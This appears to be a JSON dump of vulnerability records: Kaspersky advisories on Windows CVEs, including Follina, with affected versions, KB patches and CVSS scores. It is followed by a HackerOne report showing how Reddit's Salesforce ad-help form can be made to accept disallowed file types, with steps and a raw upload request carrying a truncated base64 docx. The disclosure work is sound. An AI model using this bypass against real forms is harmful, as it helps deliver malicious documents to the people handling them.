for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2012 R2 \nWindows Server, version 20H2 (Server Core Installation) \nWindows Server 2016 \nWindows Server 2019 \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows RT 8.1 \nWindows Server 2022 \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows Server 2022 (Server Core installation) \nWindows 11 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems \nWindows 8.1 for x64-based systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 Version 20H2 for 32-bit Systems \nWindows Server 2022 Azure Edition Core Hotpatch \nMicrosoft Windows Support Diagnostic Tool (MSDT)\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-30190](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30190>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *Microsoft official advisories*:\n\n\n### *KB list*:\n[5014702](<http://support.microsoft.com/kb/5014702>) \n[5014699](<http://support.microsoft.com/kb/5014699>) \n[5014692](<http://support.microsoft.com/kb/5014692>) \n[5014710](<http://support.microsoft.com/kb/5014710>) \n[5014747](<http://support.microsoft.com/kb/5014747>) \n[5014678](<http://support.microsoft.com/kb/5014678>) \n[5014738](<http://support.microsoft.com/kb/5014738>) \n[5014741](<http://support.microsoft.com/kb/5014741>) \n[5014697](<http://support.microsoft.com/kb/5014697>) \n[5014746](<http://support.microsoft.com/kb/5014746>)", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2022-05-30T00:00:00", "type": "kaspersky", "title": "KLA12549 RCE vulnerability in Microsoft Windows", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-30190"], "modified": "2022-06-15T00:00:00", "id": "KLA12549", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12549/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-08-11T08:18:35", "description": "### *Detect date*:\n08/09/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Products (Extended Security Update). Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, execute arbitrary code, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows Server 2008 for 32-bit Systems Service Pack 2 (Server Core installation) \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 \nWindows 7 for x64-based Systems Service Pack 1 \nWindows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation) \nWindows 7 for 32-bit Systems Service Pack 1 \nWindows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation) \nWindows Server 2008 for 32-bit Systems Service Pack 2 \nWindows Server 2008 for x64-based Systems Service Pack 2\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-35759](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35759>) \n[CVE-2022-34690](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34690>) \n[CVE-2022-35745](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35745>) \n[CVE-2022-35750](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35750>) \n[CVE-2022-34708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34708>) \n[CVE-2022-35753](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35753>) \n[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) \n[CVE-2022-35751](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35751>) \n[CVE-2022-34701](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34701>) \n[CVE-2022-34707](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34707>) \n[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) \n[CVE-2022-35820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35820>) \n[CVE-2022-30194](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30194>) \n[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) \n[CVE-2022-34706](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34706>) \n[CVE-2022-34714](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34714>) \n[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>) \n[CVE-2022-35758](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35758>) \n[CVE-2022-35767](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35767>) \n[CVE-2022-35769](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35769>) \n[CVE-2022-35795](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35795>) \n[CVE-2022-35760](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35760>) \n[CVE-2022-35768](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35768>) \n[CVE-2022-35752](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35752>) \n[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) \n[CVE-2022-35747](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35747>) \n[CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) \n[CVE-2022-35756](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35756>) \n[CVE-2022-34702](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34702>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5016686](<http://support.microsoft.com/kb/5016686>) \n[5016669](<http://support.microsoft.com/kb/5016669>) \n[5016679](<http://support.microsoft.com/kb/5016679>) \n[5016676](<http://support.microsoft.com/kb/5016676>)", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "kaspersky", "title": "KLA12603 Multiple vulnerabilities in Microsoft Products (ESU)", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30194", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35747", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35756", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35793", "CVE-2022-35795", "CVE-2022-35820"], "modified": "2022-08-10T00:00:00", "id": "KLA12603", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12603/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2022-09-27T08:08:51", "description": "### *Detect date*:\n08/09/2022\n\n### *Severity*:\nCritical\n\n### *Description*:\nMultiple vulnerabilities were found in Microsoft Windows. Malicious users can exploit these vulnerabilities to cause denial of service, gain privileges, bypass security restrictions, execute arbitrary code, obtain sensitive information.\n\n### *Exploitation*:\nMalware exists for this vulnerability. Usually such malware is classified as Exploit. [More details](<https://threats.kaspersky.com/en/class/Exploit/>).\n\n### *Affected products*:\nWindows 8.1 for x64-based systems \nWindows Server 2012 R2 \nWindows Server 2012 R2 (Server Core installation) \nWindows 10 for 32-bit Systems \nWindows 8.1 for 32-bit systems \nWindows Server 2022 (Server Core installation) \nWindows Server 2019 (Server Core installation) \nWindows Server 2022 \nWindows 10 Version 1809 for 32-bit Systems \nWindows 10 Version 20H2 for x64-based Systems \nWindows 10 Version 1607 for x64-based Systems \nWindows Server 2012 (Server Core installation) \nWindows 10 Version 21H2 for x64-based Systems \nWindows 10 Version 21H1 for 32-bit Systems \nWindows Server 2012 \nWindows 10 Version 20H2 for 32-bit Systems \nWindows 11 for ARM64-based Systems \nWindows Server 2016 \nWindows 10 Version 21H2 for ARM64-based Systems \nWindows 10 Version 1607 for 32-bit Systems \nWindows 10 Version 21H2 for 32-bit Systems \nWindows Server 2019 \nWindows 10 for x64-based Systems \nWindows Server, version 20H2 (Server Core Installation) \nWindows RT 8.1 \nWindows 10 Version 21H1 for ARM64-based Systems \nWindows 10 Version 1809 for x64-based Systems \nWindows Server 2016 (Server Core installation) \nWindows 10 Version 21H1 for x64-based Systems \nWindows 10 Version 20H2 for ARM64-based Systems \nWindows 11 for x64-based Systems \nWindows 10 Version 1809 for ARM64-based Systems\n\n### *Solution*:\nInstall necessary updates from the KB section, that are listed in your Windows Update (Windows Update usually can be accessed from the Control Panel)\n\n### *Original advisories*:\n[CVE-2022-35759](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35759>) \n[CVE-2022-34705](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34705>) \n[CVE-2022-35765](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35765>) \n[CVE-2022-34303](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34303>) \n[CVE-2022-35763](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35763>) \n[CVE-2022-34703](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34703>) \n[CVE-2022-35751](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35751>) \n[CVE-2022-34707](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34707>) \n[CVE-2022-30194](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30194>) \n[CVE-2022-35771](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35771>) \n[CVE-2022-35744](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35744>) \n[CVE-2022-34714](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34714>) \n[CVE-2022-34301](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34301>) \n[CVE-2022-35794](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35794>) \n[CVE-2022-35766](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35766>) \n[CVE-2022-34709](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34709>) \n[CVE-2022-34704](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34704>) \n[CVE-2022-35767](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35767>) \n[CVE-2022-35769](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35769>) \n[CVE-2022-35804](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35804>) \n[CVE-2022-30197](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30197>) \n[CVE-2022-35795](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35795>) \n[CVE-2022-35760](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35760>) \n[CVE-2022-35793](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35793>) \n[CVE-2022-35747](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35747>) \n[CVE-2022-35743](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35743>) \n[CVE-2022-35764](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35764>) \n[CVE-2022-30144](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30144>) \n[CVE-2022-35761](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35761>) \n[CVE-2022-35762](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35762>) \n[CVE-2022-34702](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34702>) \n[CVE-2022-35757](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35757>) \n[CVE-2022-34690](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34690>) \n[CVE-2022-35745](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35745>) \n[CVE-2022-35750](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35750>) \n[CVE-2022-34708](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34708>) \n[CVE-2022-35792](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35792>) \n[CVE-2022-35753](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35753>) \n[CVE-2022-34712](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34712>) \n[CVE-2022-34701](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34701>) \n[CVE-2022-34691](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34691>) \n[CVE-2022-34302](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34302>) \n[CVE-2022-35746](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35746>) \n[CVE-2022-34713](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34713>) \n[CVE-2022-35820](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35820>) \n[CVE-2022-34696](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34696>) \n[CVE-2022-33670](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-33670>) \n[CVE-2022-34706](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34706>) \n[CVE-2022-34699](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34699>) \n[CVE-2022-35754](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35754>) \n[CVE-2022-35748](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35748>) \n[CVE-2022-30133](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-30133>) \n[CVE-2022-35758](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35758>) \n[CVE-2022-35755](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35755>) \n[CVE-2022-35797](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35797>) \n[CVE-2022-35749](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35749>) \n[CVE-2022-35768](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35768>) \n[CVE-2022-35752](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35752>) \n[CVE-2022-34715](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34715>) \n[CVE-2022-34710](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-34710>) \n[CVE-2022-35756](<https://msrc.microsoft.com/update-guide/vulnerability/CVE-2022-35756>) \n\n\n### *Impacts*:\nACE \n\n### *Related products*:\n[Microsoft Windows](<https://threats.kaspersky.com/en/product/Microsoft-Windows/>)\n\n### *KB list*:\n[5016627](<http://support.microsoft.com/kb/5016627>) \n[5016672](<http://support.microsoft.com/kb/5016672>) \n[5016622](<http://support.microsoft.com/kb/5016622>) \n[5016683](<http://support.microsoft.com/kb/5016683>) \n[5016639](<http://support.microsoft.com/kb/5016639>) \n[5016616](<http://support.microsoft.com/kb/5016616>) \n[5016623](<http://support.microsoft.com/kb/5016623>) \n[5016684](<http://support.microsoft.com/kb/5016684>) \n[5016681](<http://support.microsoft.com/kb/5016681>) \n[5012170](<http://support.microsoft.com/kb/5012170>) \n[5016629](<http://support.microsoft.com/kb/5016629>)\n\n### *Microsoft official advisories*:", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-08-09T00:00:00", "type": "kaspersky", "title": "KLA12602 Multiple vulnerabilities in Microsoft Windows", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2022-30133", "CVE-2022-30144", "CVE-2022-30194", "CVE-2022-30197", "CVE-2022-33670", "CVE-2022-34301", "CVE-2022-34302", "CVE-2022-34303", "CVE-2022-34690", "CVE-2022-34691", "CVE-2022-34696", "CVE-2022-34699", "CVE-2022-34701", "CVE-2022-34702", "CVE-2022-34703", "CVE-2022-34704", "CVE-2022-34705", "CVE-2022-34706", "CVE-2022-34707", "CVE-2022-34708", "CVE-2022-34709", "CVE-2022-34710", "CVE-2022-34712", "CVE-2022-34713", "CVE-2022-34714", "CVE-2022-34715", "CVE-2022-35743", "CVE-2022-35744", "CVE-2022-35745", "CVE-2022-35746", "CVE-2022-35747", "CVE-2022-35748", "CVE-2022-35749", "CVE-2022-35750", "CVE-2022-35751", "CVE-2022-35752", "CVE-2022-35753", "CVE-2022-35754", "CVE-2022-35755", "CVE-2022-35756", "CVE-2022-35757", "CVE-2022-35758", "CVE-2022-35759", "CVE-2022-35760", "CVE-2022-35761", "CVE-2022-35762", "CVE-2022-35763", "CVE-2022-35764", "CVE-2022-35765", "CVE-2022-35766", "CVE-2022-35767", "CVE-2022-35768", "CVE-2022-35769", "CVE-2022-35771", "CVE-2022-35792", "CVE-2022-35793", "CVE-2022-35794", "CVE-2022-35795", "CVE-2022-35797", "CVE-2022-35804", "CVE-2022-35820"], "modified": "2022-09-27T00:00:00", "id": "KLA12602", "href": "https://threats.kaspersky.com/en/vulnerability/KLA12602/", "cvss": {"score": 0.0, "vector": "NONE"}}], "hackerone": [{"lastseen": "2023-02-03T02:24:51", "bounty": 100.0, "description": "## Summary:\nReddit.secure.force.com is Reddit SalesForce instance. Attacker is able to send attachments of disallowed filetypes to this server. The attacker is able to send malicious documents such as CVE-2022-30190 Follina to the victim.\n\n## Impact:\nAttacker can send malicious files to whoever handles the form behind https://reddit.secure.force.com/adhelp\n\n## Steps To Reproduce:\n 1. Go to https://reddit.secure.force.com/adhelp \n 2. Notice that the specified allowed filetype is: jpg jpeg gif png pdf as you can see with the image below: \n\n{F1780944}\n\n 3. If you try dragging and dropping a docx file to that box, there is a Javascript which forbids such action. But if you used the \"Click to browse\" option you can start uploading the file.\n\n{F1780957}\n\n4. The file upload request: \n\n```http\nPOST /adhelp/apexremote HTTP/1.1\nHost: reddit.secure.force.com\n\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:91.0) Gecko/20100101 Firefox/91.0\nAccept: */*\nAccept-Language: en-US,en;q=0.5\nAccept-Encoding: gzip, deflate\nReferer: https://reddit.secure.force.com/adhelp/\nX-User-Agent: Visualforce-Remoting\nContent-Type: application/json\nX-Requested-With: XMLHttpRequest\nContent-Length: 15301\nOrigin: https://reddit.secure.force.com\nSec-Fetch-Dest: empty\nSec-Fetch-Mode: cors\nSec-Fetch-Site: same-origin\nTe: trailers\nConnection: close\n\n{\"action\":\"AdvertisingHelpController\",\"method\":\"uploadFile\",\"data\":[\"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